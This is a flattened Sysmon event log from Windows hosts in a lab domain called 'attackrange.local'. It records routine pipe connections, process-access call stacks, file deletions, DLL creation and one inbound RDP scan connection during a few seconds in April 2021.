RT4.dll+1ae1c 10341000x800000000000000079080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.295{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000079079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.295{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000079078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.295{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000079077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.295{A7A01FEF-C0A6-607E-7805-00000000BB01}4242312C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000079076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.154{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000050505Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:13.735{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63297-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050504Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:15.540{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B67E1F9CECDB7F311FE27721144BC26,SHA256=EAFC774127AE1F45D495A1B083A19F63D5EC3FB657E582B34F32AB3CFBB9B41F,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000079237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.841{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.841{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.841{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.810{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.810{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.810{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000079224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.795{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5455841513679CAA411B4BE2C8CA251,SHA256=A1C9DCE1F3F68AC70EE5597AC0DC96581E03BC8F2D9B0809722C9C407488BE2A,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000079223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.560{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.513{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000079206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.482{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI9B1F.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000079205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:16.326{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5Gui.dll2021-04-20 14:58:16.326 11241100x800000000000000079204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:16.295{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileSyncApi64.dll2021-04-20 14:58:16.295 18141800x800000000000000079203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000079192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:16.232{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-B622-607E-0100-00000000BB01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 18141800x800000000000000079191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:16.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 